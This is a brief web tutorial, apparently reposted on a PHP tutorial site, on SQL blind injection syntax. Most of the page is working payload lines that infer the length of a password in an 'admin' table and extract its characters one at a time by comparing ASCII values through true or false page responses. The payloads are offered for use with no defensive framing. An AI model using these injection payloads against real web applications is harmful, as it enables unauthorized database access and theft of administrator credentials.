Home >Database >Mysql Tutorial >About sql blind injection syntax

About sql blind injection syntax

藏色散人
藏色散人forward
2020-04-03 13:16:512310browse

If the page does not display wrong numbers, use blind injection syntax to determine the data content based on page changes

Get the data length:

and (select top 1 len(列名) from 表名)>5
and (select top 1 len(password) from admin)>16//错误
and (select top 1 len(password) from admin)>15//正常

Get the specified number of digits of data:

and (select top 1 asc(mid(列名,位置,1)) from 表名)>97
and (select top 1 asc(mid(admin,1,1)) from admin)>96//判断admin字段的内容第一位的ascii码值大于96 正常
and (select top 1 asc(mid(admin,1,1)) from admin)>97//判断admin字段的内容第一位的ascii码值大于97 错误 说明就是97

mid(字符串,截取的位置,截取字符数)
asc() //将字符转换成ascii码 方便进行比较

Recommended: "mysql video tutorial"

The above is the detailed content of About sql blind injection syntax. For more information, please follow other related articles on the PHP Chinese website!

Statement:
This article is reproduced at:cnblogs.com. If there is any infringement, please contact admin@php.cn delete